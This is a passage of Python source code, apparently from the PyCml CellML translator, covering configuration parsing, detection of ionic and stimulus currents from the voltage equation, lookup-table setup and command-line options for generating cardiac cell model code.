ionic current variables. It may also match the stimulus
current, but the stimulus will never be considered an ionic
current. The value is split on ','; the first part is then
matched against component names, and the second against
variables in matching components.
This is mostly redundant now, because the equation for dV/dt
is used first to determine the ionic currents (see documentation
for _find_transmembrane_currents_from_voltage_ode), and only
if this fails to find suitable currents will the ionic_match
definition be used.
* 'transmembrane_potential'
Defines which variable holds the transmembrane potential.
Defaults to 'membrane,V' if not present.
* 'membrane_capacitance'
Defines which variable holds the cell membrane capacitance.
The root element also contains 0 or more 'for_model' elements,
which contain settings for individual models. These must have
at least one of an 'id' or 'name' attribute, which specify the
model in question. They can also contain anything allowable as
global configuration options. Options given here override those
specified globally.
Configuration which is identical for groups of models may be given
using the 'for_models' element. This has an 'ids' element as its
first child, which contains 'id' elements holding either the name
or id of a model. The remaining contents of the 'for_models'
element are as for 'for_model'.
There are 3 ways of specifying variables:
1. By name (var type='name')
Variable names are given in full form, i.e. component_name,variable_name
2. By standardised name (var type='oxmeta')
Use the name from the oxmeta annotations
3. By reference to a section of the config file (when defining lookup table keys)
e.g. <var type='config-name'>transmembrane_potential</var>
Within any element that specifies a variable, a list of <var> elements can be
provided. Each will be tried in turn to see if a match can be found in the model,
and the first match wins.
Some items are overridden if oxmeta annotations are present in the model, with
the annotated variable taking precedence over the config file specification.
"""
DEBUG('config', "Reading configuration from ", config_file)
binder = amara.bindery.binder()
binder.set_binding_class(None, "units", cellml_units)
binder.set_binding_class(None, "unit", cellml_unit)
rules = [bt.ws_strip_element_rule(u'*')]
config_doc = amara_parse(config_file, rules=rules, binderobj=binder)
# Store extra units definitions
for defn in config_doc.xml_xpath(u'/*/units'):
defn.xml_parent = self.unit_definitions # Needed for looking up the units this definition is derived from
self.unit_definitions.add_units(defn.name, defn)
# Overrides for command-line options
if self.options and hasattr(config_doc.pycml_config, 'command_line_args'):
args = map(str, config_doc.pycml_config.command_line_args.arg)
args.append('dummy-file')
get_options(args, self.options)
# Sections to use in configuration; later sections take precedence
sections = []
# Use global configuration?
glo = config_doc.xml_xpath(u'/*/global')
if glo:
sections.append(glo[0])
# Get the config section(s) for our model. Sections
# specifically for this model come after sections covering
# multiple models, so they take precedence.
model_id = getattr(self.doc.model, u'id', self.doc.model.name)
sections.extend(config_doc.xml_xpath(
u'/*/for_models[ids/id="%s" or ids/id="%s"]'
% (self.doc.model.name, model_id)))
sections.extend(config_doc.xml_xpath(
u'/*/for_model[@name="%s" or @id="%s"]'
% (self.doc.model.name, model_id)))
# Main items of configuration
for section in sections:
if hasattr(section, u'lookup_tables'):
self._parse_lookup_tables(section.lookup_tables)
if hasattr(section, u'currents'):
self._parse_currents(section.currents)
if hasattr(section, u'transmembrane_potential'):
self._parse_Vm(section.transmembrane_potential)
if hasattr(section, u'membrane_capacitance'):
self._parse_Cm(section.membrane_capacitance)
def finalize_config(self):
"""Having read all the configuration files, apply to the model."""
# If no LT options given, add defaults
if not self.lut_config:
config_key = ('config-name', 'transmembrane_potential')
self.lut_config[config_key] = {}
self._set_lut_defaults(self.lut_config[config_key])
# Identify the variables in the model
self.find_transmembrane_potential()
self.find_membrane_capacitance()
if not self.options.protocol:
self.find_current_vars()
def _create_var_def(self, content, defn_type):
"""Create a variable definition object."""
xml_fragment = '<var type="%s">%s</var>' % (defn_type, content)
return amara.parse(str(xml_fragment)).var
def _check_var_def(self, var_elt, var_desc):
"""Check a variable definition is syntactically valid.
If type == 'name', it must have text content of the form "component_name,variable_name".
If type == 'oxmeta', it must have text content drawn from METADATA_NAMES.
If type == 'config-name', it must have text content either 'stimulus' or 'transmembrane_potential'.
"""
defn_type = getattr(var_elt, u'type', u'name')
if defn_type == u'name':
name_parts = unicode(var_elt).strip().split(',')
if len(name_parts) != 2:
raise ConfigurationError('Invalid definition of ' + var_desc + ': '
+ unicode(var_elt))
elif defn_type == u'oxmeta':
if unicode(var_elt) not in cellml_metadata.METADATA_NAMES:
raise ConfigurationError('"' + unicode(var_elt) + '" is not a valid oxmeta name')
elif defn_type == u'config-name':
if unicode(var_elt) not in [u'stimulus', u'transmembrane_potential', u'membrane_capacitance']:
raise ConfigurationError('"' + unicode(var_elt) + '" is not a name known to the config file')
else:
raise ConfigurationError('"' + defn_type + '" is not a valid variable definition type')
return
def _parse_var(self, elt, name):
"""Parse definition of a special variable."""
if hasattr(elt, 'var'):
# List of possibilities
defs = []
for vardef in elt.var:
self._check_var_def(vardef, name)
defs.append(vardef)
else:
# Old style - single variable given by text content
self._check_var_def(elt, name)
defs = [elt]
return defs
def _parse_Vm(self, vm_elt):
"""Parse definition of variable holding the transmembrane potential."""
self.V_definitions = self._parse_var(vm_elt, 'transmembrane_potential')
def _parse_Cm(self, cm_elt):
"""Parse definition of variable holding the cell membrane capacitance."""
self.Cm_definitions = self._parse_var(cm_elt, 'membrane_capacitance')
def _parse_currents(self, currents):
"""Parse definitions of ionic and stimulus currents."""
if hasattr(currents, u'stimulus'):
self.i_stim_definitions = self._parse_var(currents.stimulus, 'stimulus current')
if hasattr(currents, u'ionic_match'):
self.i_ionic_definitions = self._parse_var(currents.ionic_match, 'ionic currents')
return
def _find_variable(self, defn, pe_done=False):
"""Find a variable matching the given definition.
If pe_done is True, then partial evaluation has been performed
on the model, so looking for variables by name needs to look for
variables called compname__varname in the single component.
"""
defn_type = getattr(defn, u'type', u'name')
if defn_type == u'name':
name_parts = unicode(defn).strip().split(',')
if pe_done:
try:
var = self.doc.model.component.get_variable_by_name(u'__'.join(name_parts))
except KeyError:
var = None
else:
var = self.doc.model.xml_xpath(u'cml:component[@name="%s"]/cml:variable[@name="%s"]'
% tuple(name_parts))
if var:
var = var[0]
elif defn_type == u'oxmeta':
var = self.doc.model.get_variable_by_oxmeta_name(str(defn), throw=False)
elif defn_type == u'config-name':
if unicode(defn) == u'stimulus':
var = self.i_stim_var
elif unicode(defn) == u'transmembrane_potential':
var = self.V_variable
elif unicode(defn) == u'membrane_capacitance':
var = self.Cm_variable
else:
raise ConfigurationError('"' + str(defn) + '" is not a valid configuration file variable name')
else:
raise ConfigurationError('"' + defn_type + '" is not a valid variable definition type')
return var
def _process_ci_elts(self, elt, func, **kwargs):
"""Recursively apply func to any ci elements in the tree rooted at elt."""
if isinstance(elt, mathml_ci):
func(elt, **kwargs)
else:
for child in getattr(elt, 'xml_children', []):
self._process_ci_elts(child, func, **kwargs)
def _find_transmembrane_currents_from_voltage_ode(self):
"""Analyse the expression for dV/dt to determine the transmembrane currents.
Looks for an equation defining dV/d(something) and assumes the something is
time; this will be checked during code generation for Chaste. It then finds
all variables on the RHS of this equation which have the same units as the
stimulus current (self.i_stim_var) and identifies these as transmembrane
currents. Will automatically exclude the stimulus current.
If self.V_variable is not set, returns the empty list.
"""
if not self.V_variable:
DEBUG('config', "Transmembrane potential not configured, so can't determine currents from its ODE")
return []
if self.i_stim_var:
current_units = [self.i_stim_var.component.get_units_by_name(self.i_stim_var.units)]
else:
current_units = CellMLToChasteTranslator.get_current_units_options(self.doc.model)
ionic_vars = []
def find_units_match(test_units, units_list, remove_match=False, keep_only_match=False):
"""Look for a units definition dimensionally equivalent to test_units within units_list.
If remove_match is True, remove the first match from the list.
If keep_only_match is True, remove all entries except the first match from the list.
Return the matching units, or None if there are no matches.
"""
for units in units_list:
if test_units.dimensionally_equivalent(units):
match = units
break
else:
match = None
if match and remove_match:
units_list.remove(match)
if match and keep_only_match:
units_list[:] = []
units_list.append(match)
return match
def clear_values(expr, process_definitions=False):
"""Recursively clear saved values for variables in this expression.
If process_definitions is True, recursively treat expressions defining variables
used in this expression, too.
"""
def process_var(var):
var.unset_values()
var._unset_binding_time(only_temporary=True)
if process_definitions:
defn = var.get_dependencies()
if defn:
if isinstance(defn[0], mathml_apply):
clear_values(defn[0].eq.rhs, process_definitions=True)
elif isinstance(defn[0], cellml_variable):
process_var(defn[0])
def process_ci(ci_elt):
process_var(ci_elt.variable)
self._process_ci_elts(expr, process_ci)
def check_if_current(ci_elt, vars_found):
"""Check if this is a transmembrane current."""
v = ci_elt.variable
if v.get_source_variable(recurse=True) is not self.i_stim_var:
vars_found.append(v)
# Check units
u = v.component.get_units_by_name(v.units)
if find_units_match(u, current_units, keep_only_match=True):
ionic_vars.append(v.get_source_variable(recurse=True))
ionic_vars[-1]._cml_ref_in_dvdt = ci_elt # Hack for data clamp support (#2708)
# Fake this variable being 1 so we can check the sign of GetIIonic
if not v.is_statically_const(ignore_annotations=True):
v.set_value(1.0)
def bfs(func, vars, *args, **kwargs):
"""Do a breadth first search of the definitions of variables in vars.
func is the recursive function to call. It will be given the list of defining expressions
as its first argument, and args and kwargs as remaining arguments.
"""
def get_defn(var):
defn = var.get_dependencies()
if defn:
var._set_binding_time(BINDING_TIMES.static, temporary=True)
if isinstance(defn[0], cellml_variable):
defn = get_defn(defn[0])
else:
assert isinstance(defn[0], mathml_apply)
var.unset_values()
defn = defn[0].eq.rhs
return defn
defns = []
for var in vars:
defn = get_defn(var)
if defn:
defns.append(defn)
if defns:
func(defns, *args, **kwargs)
def find_currents(exprs, depth=0, maxdepth=2):
"""Find ionic currents by searching the given expressions.
On the initial call, exprs should contain just the definition of dV/dt (i.e. the RHS).
Uses breadth-first search of the equation dependency tree to find variables that
have units dimensionally equivalent to one of the current formulations that Chaste
can handle, or equivalent to the stimulus current's units if one is defined.
Initially, A_per_F is removed from the list, since the RHS of dV/dt should always
have equivalent dimensions. If another option can't be found within maxdepth levels,
we restart the search with A_per_F included. The depth limit is intended to guard against
unexpectedly finding something that isn't a current; it's somewhat dodgy, but won't
break on any model I know, and I haven't thought of a better approach yet.
When one variable with suitable units is found, further ionic currents must have units
equivalent to its to be found. Also once one ionic current is found, only the remaining
expressions at its depth will be processed.
"""
if depth == 0 and maxdepth > 0:
dvdt_units = exprs[0].xml_parent.eq.lhs.get_units()
A_per_F = find_units_match(dvdt_units, current_units, remove_match=True)
# Process all expressions at this depth
vars_found = []
for expr in exprs:
self._process_ci_elts(expr, check_if_current, vars_found=vars_found)
if not ionic_vars and depth != maxdepth:
# Process the definitions of expressions at this depth
bfs(find_currents, vars_found, depth+1, maxdepth)
# If we reached maxdepth unsuccessfully, try again with A_per_F included
if not ionic_vars and depth == 0 and maxdepth > 0:
current_units.append(A_per_F)
find_currents(exprs, depth, maxdepth=-1)
def assign_values_for_stimulus_check(exprs, found_stim=Sentinel()):
"""Assign temporary values to variables in order to check the stimulus sign.
This will process defining expressions in a breadth first search until the stimulus
current is found. Each variable that doesn't have its definitions processed will
be given a value as follows:
- stimulus current = 1
- other currents = 0
- other variables = 1
The stimulus current is then negated from the sign expected by Chaste if evaluating
dV/dt gives a positive value.
"""
assert len(current_units) == 1 # We are using the stimulus units
vars = []
def f(ci_elt):
v = ci_elt.variable
if v.get_source_variable(recurse=True) is self.i_stim_var:
v.set_value(1.0)
found_stim.set()
else:
u = v.component.get_units_by_name(v.units)
if u.dimensionally_equivalent(current_units[0]):
v.set_value(0.0)
elif not v.is_statically_const(ignore_annotations=True):
v.set_value(1.0)
vars.append(v)
for expr in exprs:
self._process_ci_elts(expr, f)
if not found_stim:
bfs(assign_values_for_stimulus_check, vars, found_stim=found_stim)
# Iterate over all expressions in the model, to find the one for dV/d(something)
for expr in (e for e in self.doc.model.get_assignments() if isinstance(e, mathml_apply) and e.is_ode()):
# Assume the independent variable is time; if it isn't, we'll catch this later
(dep_var, time_var) = expr.assigned_variable()
if dep_var.get_source_variable(recurse=True) is self.V_variable:
# Recursively search for ionic currents
find_currents([expr.eq.rhs])
# Check the sign of the RHS
self.i_ionic_negated = expr.eq.rhs.evaluate() > 0.0
clear_values(expr.eq.rhs, process_definitions=True)
if self.i_stim_var:
# Check the sign of the stimulus current
assign_values_for_stimulus_check([expr.eq.rhs])
self.i_stim_negated = expr.eq.rhs.evaluate() > 0.0
clear_values(expr.eq.rhs, process_definitions=True)
# Found dV/d(something); don't check any more expressions
break
DEBUG('config', "Found ionic currents from dV/dt: ", ionic_vars)
call_if(self.i_ionic_negated, DEBUG, 'config', "Ionic current is negated")
call_if(self.i_stim_negated, DEBUG, 'config', "Stimulus current is negated")
return ionic_vars
def _find_var(self, oxmeta_name, definitions):
"""Find the variable object in the model for a particular concept.
Will look for a variable annotated with the given oxmeta_name first, then
try the list of definitions from the configuration file in turn.
"""
var = None
# Prepend an oxmeta definition
oxmeta_defn = self._create_var_def(oxmeta_name, 'oxmeta')
for defn in [oxmeta_defn] + definitions:
var = self._find_variable(defn)
if var:
break
return var
def find_current_vars(self):
"""Find the variables representing currents."""
# Find the stimulus current, if it exists for this kind of model (some are self-excitatory)
if not self.doc.model.is_self_excitatory():
self.i_stim_var = self._find_var('membrane_stimulus_current', self.i_stim_definitions)
DEBUG('config', 'Found stimulus', self.i_stim_var)
if not self.i_stim_var:
# No match :(
msg = "No stimulus current found; you'll have trouble generating Chaste code"
if self.options.fully_automatic:
raise ConfigurationError(msg)
else:
print >>sys.stderr, msg
self.i_stim_var = None
# For other ionic currents, try using the equation for dV/dt unless told otherwise
if not self.options.use_i_ionic_regexp:
self.i_ionic_vars = self._find_transmembrane_currents_from_voltage_ode()
else:
for defn in self.i_ionic_definitions:
if getattr(defn, u'type', u'name') != u'name':
raise ConfigurationError('Ionic current definitions have to have type "name"')
regexps = unicode(defn).strip().split(',')
comp_re = re.compile(regexps[0] + '$')
var_re = re.compile(regexps[1] + '$')
for component in getattr(self.doc.model, u'component', []):
if comp_re.match(unicode(component.name).strip()):
for var in getattr(component, u'variable', []):
if (var is not self.i_stim_var and
var_re.match(unicode(var.name).strip())):
self.i_ionic_vars.append(var)
if not self.i_ionic_vars:
msg = "No ionic currents found; you'll have trouble generating Chaste code"
if self.options.fully_automatic:
raise ConfigurationError(msg)
else:
print >>sys.stderr, msg
return
def _parse_lookup_tables(self, lookup_tables):
"""Parse a lookup_tables element."""
for lt in lookup_tables.lookup_table:
var_type = getattr(lt.var, u'type', u'name')
var_name = unicode(lt.var).strip()
config_key = (var_type, var_name)
            if config_key not in self.lut_config:
self.lut_config[config_key] = {}
self._set_lut_defaults(self.lut_config[config_key])
for elt in lt.xml_element_children():
if elt.localName != u'var':
self.lut_config[config_key]['table_' + elt.localName] = unicode(elt).strip()
if hasattr(lt, u'units'):
try:
units = self.unit_definitions.get_units_by_name(lt.units)
except KeyError:
raise ConfigurationError('The units "%s" referenced by the lookup table for "%s" do not exist'
% (lt.units, var_name))
self.lut_config[config_key]['table_units'] = units
return
def _set_lut_defaults(self, lut_dict):
"""Set default configuration for a lookup table."""
def_dict = optimize.LookupTableAnalyser._LT_DEFAULTS
for k, v in def_dict.iteritems():
if k != 'table_var':
lut_dict[k] = v
lut_dict['table_units'] = None
return
def annotate_currents_for_pe(self):
"""Annotate ionic & stimulus current vars so PE doesn't remove them.
Also annotate the membrane capacitance, if defined."""
if self.i_stim_var:
self.i_stim_var.set_pe_keep(True)
for var in self.i_ionic_vars:
var.set_pe_keep(True)
if self.Cm_variable:
self.Cm_variable.set_pe_keep(True)
return
def expose_variables(self):
"""Expose variables for access with GetAnyVariable if desired."""
def annotate(var):
t = var.get_type()
if t == VarTypes.Constant:
var.set_is_modifiable_parameter(True)
elif t in [VarTypes.Computed, VarTypes.Free, VarTypes.Mapped]:
var.set_is_derived_quantity(True)
if self.options.expose_annotated_variables:
for var in self.metadata_vars:
if (not self.options.use_chaste_stimulus or
not var.oxmeta_name in cellml_metadata.STIMULUS_NAMES):
annotate(var)
DEBUG('translate', "+++ Exposed annotated variables")
if self.options.expose_all_variables:
for var in self.doc.model.get_all_variables():
annotate(var)
DEBUG('translate', "+++ Exposed all variables")
def annotate_metadata_for_pe(self):
"Annotate all vars tagged with metadata so PE doesn't remove them."
for var in self.metadata_vars:
var.set_pe_keep(True)
return
def find_transmembrane_potential(self):
"""Find and store the variable object representing V.
Tries metadata annotation first. If that fails, uses the name given in
the command line options, if present. If that fails, uses the config file.
"""
if not self.options:
raise ValueError('No command line options given')
# Check command line option before config file
if self.options.transmembrane_potential:
self.V_definitions[0:0] = [self.options.transmembrane_potential.strip().split(',')]
if len(self.V_definitions[0]) != 2:
raise ConfigurationError('The name of V must contain both component and variable name')
self.V_variable = self._find_var('membrane_voltage', self.V_definitions)
DEBUG('config', 'Found V', self.V_variable)
if not self.V_variable and not self.options.protocol:
raise ConfigurationError('No transmembrane potential found; check your configuration')
return self.V_variable
def find_membrane_capacitance(self):
"""Find and store the variable object representing the cell membrane capacitance.
        Uses metadata first, if present, then the configuration file."""
self.Cm_variable = self._find_var('membrane_capacitance', self.Cm_definitions)
DEBUG('config', 'Found capacitance', self.Cm_variable)
def find_lookup_variables(self):
"""Find the variable objects used as lookup table keys.
This method translates the variable names given in the configuration file into objects
in the document, and then uses those objects as keys in our lut_config dictionary.
The ultimate source variable for the variable specified is used, in order to avoid
complications caused by intermediaries being removed (e.g. by PE).
The table settings are also units-converted to match the units of the key variable.
"""
new_config = {}
for key in self.lut_config:
defn_type, content = key
defn = self._create_var_def(content, defn_type)
var = self._find_variable(defn)
if not var:
# Variable doesn't exist, so we can't index on it
LOG('lookup-tables', logging.WARNING, 'Variable', content, 'not found, so not using as table index.')
else:
var = var.get_source_variable(recurse=True)
                if var not in new_config:
new_config[var] = {}
new_config[var].update(self.lut_config[key])
# Apply units conversions to the table settings if required
table_units = new_config[var]['table_units']
if table_units:
var_units = var.get_units()
if not table_units.dimensionally_equivalent(var_units):
LOG('lookup-tables', logging.WARNING, 'Variable', content, 'is in units', var_units.description(),
'which are incompatible with', table_units.description(), 'so not using as table index.')
elif not table_units.equals(var_units):
# New setting[var_units] = m[var_units/table_units]*(setting-o1[table_units]) + o2[var_units]
# c.f. mathml_units_mixin._add_units_conversion
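                        # e.g. converting a table bound of -100 from millivolts to volts
                        # (hypothetical units): m = 1e-3 and both offsets are 0, giving -0.1.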
                        DEBUG('lookup-tables', 'LT conversion:', table_units.description(), 'to', var_units.description(), 'equal?', table_units.equals(var_units))
m = table_units.get_multiplicative_factor() / var_units.get_multiplicative_factor()
for setting in new_config[var]:
try:
old_value = float(new_config[var][setting])
new_value = m * (old_value - table_units.get_offset()) + var_units.get_offset()
new_config[var][setting] = unicode(new_value)
                                DEBUG('lookup-tables', 'LT conversion', setting, old_value, new_value)
except (ValueError, TypeError):
pass
self.lut_config = new_config
DEBUG('config', 'Lookup tables configuration:', new_config)
return
    # TODO - move into separate metadata class?
def validate_metadata(self, assume_valid=False):
"""Check that the metadata annotations are 'sensible'.
Ensures that only names we know are used, and that the same name isn't used for multiple variables.
"""
vars = cellml_metadata.find_variables(self.doc.model, ('bqbiol:is', NSS['bqbiol']))
self.metadata_vars = filter(lambda v: v.oxmeta_name, vars)
if assume_valid:
return
names_used = [var.oxmeta_name for var in self.metadata_vars]
DEBUG('metadata', 'Names found: ', names_used)
# Check all metadata is allowed
unknown_names = frozenset(names_used) - cellml_metadata.METADATA_NAMES
if unknown_names:
msg = ['Unrecognised oxmeta variable names found (run with --assume-valid to ignore):']
msg.extend(sorted(unknown_names))
raise ConfigurationError('\n '.join(msg))
# Check for duplicates
d = {}
for name in names_used:
if name in d:
raise ConfigurationError(name + ' metadata attribute is duplicated in the cellml file.')
else:
d[name] = name
######################################################################
# For running as an executable #
######################################################################
def get_options(args, default_options=None):
"""get_options(args):
Process our command-line options.
args is a list of options & positional arguments.
default_options, if given, is an instance of optparse.Values created by a
previous call to this function.
"""
usage = 'usage: %prog [options] <cellml file or URI>'
parser = optparse.OptionParser(version="%%prog %s" % __version__,
usage=usage)
parser.add_option('-q', '--quiet', action='store_true', default=False,
help="don't show warning messages, only errors")
# What type of translation is being performed
parser.add_option('-T', '--translate',
dest='translate', action='store_true',
default=True,
help="output computer code [default]")
parser.add_option('-C', '--output-cellml',
dest='translate', action='store_false',
help="output an annotated CellML file instead of translating, on stdout unless -o specified")
translators = sorted(CellMLTranslator.translators)
parser.add_option('-t', '--translate-type',
type='choice', choices=translators,
default='Chaste', metavar='TYPE',
help="the type of code to output [default: %default]. "
"Choices: " + str(translators))
parser.add_option('-o', dest='outfilename', metavar='OUTFILE',
help="write program code to OUTFILE [default action is to use the input filename with a different extension]")
# Global adjustment settings
parser.add_option('--config-file',
action='append', default=[],
help="pathname of configuration file")
parser.add_option('-A', '--fully-automatic',
action='store_true', default=False,
help="if human intervention is required, fail noisily")
parser.add_option('--assume-valid',
action='store_true', default=False,
help="skip some of the model validation checks")
parser.add_option('--warn-on-unit-conversions',
action='store_true', default=False,
help="generate a warning if unit conversions are required")
parser.add_option('--Wu', '--warn-on-units-errors',
action='store_true', default=False,
dest='warn_on_units_errors',
help="give a warning instead of an error for dimensional inconsistencies")
parser.add_option('-V', '--transmembrane-potential', default=None, metavar='POT_VAR',
help="POT_VAR is the full name of the variable representing the transmembrane potential."
" If not specified here, the configuration file will be used, which is the prefered method."
" Defaults to 'membrane,V'.")
parser.add_option('-d', '--debug', action='store_true', default=False,
help="output debug info to stderr")
parser.add_option('-D', '--debug-source', action='append',
help="only show debug info from the specified part of the code."
" This option may appear more than once to select multiple sources. Implies -d.")
parser.add_option('--profile', action='store_true', default=False,
help="turn on profiling of PyCml")
# To examine the profile do something like:
# import os,pstats
# os.chdir('/tmp')
# files = filter(lambda f: f.startswith('pycml'), os.listdir('.'))
# p = pstats.Stats(*files)
# p.strip_dirs().sort_stats('cum').print_stats(15)
# What optimisations/transformations to do
group = optparse.OptionGroup(parser, 'Transformations',
"These options control which transformations (typically optimisations) are applied in the generated code")
group.add_option('-l', '--lookup-tables',
dest='lut', action='store_true', default=False,
help="perform a lookup table analysis")
group.add_option('-p', '--pe', '--partial-evaluation',
dest='pe', action='store_true', default=False,
help="partially evaluate the model")
group.add_option('-u', '--units-conversions',
action='store_true', default=False,
help="add explicit units conversion mathematics")
group.add_option('-j', '--maple-output',
metavar='FILENAME', default=None,
help="file containing output from a Maple script generated using -J. The generated"
" code/CellML will then contain a symbolic Jacobian as computed by Maple.")
group.add_option('-J', '--do-jacobian-analysis',
action='store_true', default=False,
help="generate code to perform Jacobian analysis for backward Euler & CVODE; implies -t Maple")
group.add_option('--backward-euler',
action='store_true', default=False,
help="generate a specialised cell model that solves itself using a decoupled"
" backward Euler method. Not compatible with --rush-larsen. Implies -t Chaste."
" Requires -j.")
group.add_option('--rush-larsen',
action='store_true', default=False,
help="use the Rush-Larsen method to solve Hodgkin-Huxley style gating variable"
" equations. Not compatible with --backward-euler. Implies -t Chaste.")
group.add_option('--grl1',
action='store_true', default=False,
help="use the GRL1 method to solve Hodgkin-Huxley style gating variable"
" equations. Not compatible with the backward Euler transformation."
" Implies -t Chaste.")
group.add_option('--grl2',
action='store_true', default=False,
help="use the GRL2 method to solve Hodgkin-Huxley style gating variable"
" equations. Not compatible with the backward Euler transformation."
" Implies -t Chaste.")
parser.add_option_group(group)
# Settings tweaking the generated code
group = optparse.OptionGroup(parser, 'Generated code options')
group.add_option('-c', '--class-name', default=None,
help="explicitly set the name of the generated class")
group.add_option('-a', '--augment-class-name',
dest='augment_class_name', action='store_true',
default=False,
help="alter the class name to show what transformations are used")
group.add_option('--no-timestamp',
action='store_true', default=False,
help="don't add a timestamp comment to generated files")
parser.add_option_group(group)
# Options specific to Maple output
group = optparse.OptionGroup(parser, 'Maple options', "Options specific to Maple code output")
group.add_option('--dont-omit-constants',
dest='omit_constants', action='store_false', default=True,
help="when generating Maple code, include assignments of constants")
group.add_option('--compute-partial-jacobian', dest='compute_full_jacobian',
action='store_false', default=True,
help="make generated Maple code compute a Jacobian specific to a Newton solve"
" of the nonlinear portion of the ODE system, rather than the full system Jacobian")
parser.add_option_group(group)
# Options specific to Python output
group = optparse.OptionGroup(parser, 'Python options', "Options specific to Python code output")
group.add_option('--no-numba', dest='numba', default=True, action='store_false',
help="turn off using Numba to optimise code on-the-fly")
parser.add_option_group(group)
# Options specific to Chaste output
group = optparse.OptionGroup(parser, 'Chaste options', "Options specific to Chaste code output")
group.add_option('-y', '--dll', '--dynamically-loadable',
dest='dynamically_loadable',
action='store_true', default=False,
help="add code to allow the model to be compiled to a shared library and dynamically loaded"
" (only works if -t Chaste is used)")
group.add_option('--use-chaste-stimulus',
action='store_true', default=False,
help="when generating Chaste code, use Chaste's stimulus rather than that defined in the model")
group.add_option('--no-use-chaste-stimulus', dest='use_chaste_stimulus',
action='store_false',
help="when generating Chaste code, use the model's stimulus, not Chaste's")
group.add_option('-i', '--convert-interfaces',
action='store_true', default=False,
help="perform units conversions at interfaces to Chaste (only works if -t Chaste is used)")
group.add_option('--use-i-ionic-regexp', dest='use_i_ionic_regexp',
action='store_true', default=False,
help="determine ionic currents from the regexp specified in the config file"
" rather than analysing the voltage derivative equation")
group.add_option('--include-dt-in-tables',
action='store_true', default=False,
help="[experimental] allow timestep to be included in lookup tables. By default"
" uses the timestep of the first cell created. Requires support from external"
" code if timestep changes. Only really useful for backward Euler cells.")
group.add_option('-m', '--use-modifiers',
action='store_true', default=False,
help="[experimental] add modifier functions for certain"
" metadata-annotated variables for use in sensitivity analysis (only works if -t Chaste is used)")
group.add_option('--use-data-clamp',
action='store_true', default=False,
help="[experimental] generate a data clamp subclass of CVODE cells"
" which contains data clamp currents for fitting experimental data (only works if -t CVODE is used)")
group.add_option('--expose-annotated-variables',
action='store_true', default=False,
help="expose all oxmeta-annotated variables for access via the GetAnyVariable functionality")
group.add_option('--expose-all-variables',
action='store_true', default=False,
help="expose all variables for access via the GetAnyVariable functionality")
parser.add_option_group(group)
# Options specific to Functional Curation
group = optparse.OptionGroup(parser, 'Functional Curation options', "Options specific to use by Functional Curation")
def protocol_callback(option, opt_str, value, parser):
"""
Protocols don't always produce normal cardiac cell models.
However, we want to allow a later option to override these changes.
"""
parser.values.protocol = value
parser.values.convert_interfaces = False
parser.values.use_chaste_stimulus = False
group.add_option('--protocol',
action='callback', callback=protocol_callback, type='string', nargs=1,
help="specify a simulation protocol to apply to the model prior to translation")
group.add_option('--protocol-options', action='store', type='string',
help="extra options for the protocol")
group.add_option('--expose-named-parameters',
action='store_true', default=False,
help="expose all constant variables with 'name' annotations for access as model parameters")
parser.add_option_group(group)
# Settings for lookup tables
group = optparse.OptionGroup(parser, 'Lookup tables options', "Options specific to the lookup tables optimisation")
lookup_type_choices = ['entry-below', 'nearest-neighbour', 'linear-interpolation']
group.add_option('--lookup-type', choices=lookup_type_choices,
default='linear-interpolation',
help="the type of table lookup to perform [default: %default]."
" Choices: " + str(lookup_type_choices))
group.add_option('--no-separate-lut-class', dest='separate_lut_class',
action='store_false', default=True,
help="don't put lookup tables in a separate class")
group.add_option('--row-lookup-method',
action='store_true', default=True,
help="add and use a method to look up a whole row of a table")
group.add_option('--no-row-lookup-method', dest='row_lookup_method',
action='store_false',
help="don't add and use a method to look up a whole row of a table")
group.add_option('--combine-commutative-tables',
action='store_true', default=False,
help="optimise a special corner case to reduce the number of tables."
" See documentation for details.")
group.add_option('--lt-index-uses-floor',
action='store_true', default=False,
help="use floor() to calculate LT indices, instead of just casting")
group.add_option('--constrain-table-indices',
action='store_true', default=False,
help="constrain lookup table index variables to remain within the bounds specified,"
" rather than throwing an exception if they go outside the bounds")
group.add_option('--no-check-lt-bounds', dest='check_lt_bounds',
action='store_false', default=True,
help="[unsafe] don't check for LT indexes going outside the table bounds")
parser.add_option_group(group)
# Settings for partial evaluation
group = optparse.OptionGroup(parser, 'Partial evaluation options', "Options specific to the partial evaluation optimisation")
group.add_option('--pe-convert-power',
action='store_true', default=False,
help="convert pow(x,3) to x*x*x; similarly for powers 2 & 4.")
group.add_option('--no-partial-pe-commutative', dest='partial_pe_commutative',
action='store_false', default=True,
help="don't combine static operands of dynamic commutative associative applys")
group.add_option('--no-pe-instantiate-tables', dest='pe_instantiate_tables',
action='store_false', default=True,
help="don't instantiate definitions that will be tables regardless of usage")
parser.add_option_group(group)
options, args = parser.parse_args(args, values=default_options)
if len(args) != 1:
parser.error("exactly one input CellML file must be specified")
# Some options imply others
if options.debug_source:
options.debug = True
if options.do_jacobian_analysis:
options.translate_type = 'Maple'
options.maple_output = False
options.rush_larsen = False
options.backward_euler = False
if options.backward_euler:
if not options.maple_output:
parser.error("Backward Euler code generation requires maple output (-j)")
options.rush_larsen = False
options.grl1 = False
options.grl2 = False
if options.rush_larsen or options.backward_euler or options.grl1 or options.grl2:
options.translate_type = 'Chaste'
if options.use_data_clamp and not options.translate_type=='CVODE':
parser.error("Data clamp option '--use-data-clamp' also requires CVODE ('-t CVODE'). If you are calling this via ConvertCellModel use '--cvode-data-clamp'.")
# Numba may not be available
if options.numba:
try:
import numba
        except ImportError:
options.numba = False
return options, args[0]
def load_model(model_file, options):
"""Load and validate a CellML model."""
# Setup logging
logging.thread = None # Hack: we're not multi-threaded, so be slightly quicker...
if options.debug:
formatter = logging.Formatter(fmt="%(name)s: %(message)s")
handler = logging.StreamHandler(sys.stderr)
handler.setFormatter(formatter)
handler.addFilter(OnlyDebugFilter())
if options.debug_source:
handler.addFilter(OnlyTheseSourcesFilter(options.debug_source))
logging.getLogger().addHandler(handler)
logging.getLogger().setLevel(logging.DEBUG)
    # We can't translate if the model is invalid, or if certain
    # warnings occurred during validation
notifier = NotifyHandler(level=logging.WARNING_TRANSLATE_ERROR)
logging.getLogger('validator').addHandler(notifier)
v = validator.CellMLValidator(create_relaxng_validator=not options.assume_valid)
valid, doc = v.validate(model_file, return_doc=True, show_warnings=not options.quiet,
check_for_units_conversions=options.warn_on_unit_conversions,
warn_on_units_errors=options.warn_on_units_errors,
assume_valid=options.assume_valid)
v.quit()
del v
if not valid or notifier.messages:
print >>sys.stderr, model_file,
if not valid:
print >>sys.stderr, "is not a valid CellML file"
else:
print >>sys.stderr, "contains untranslatable constructs"
sys.exit(1)
return doc
def run():
"""Translate the file given on the command line."""
options, model_file = get_options(sys.argv[1:])
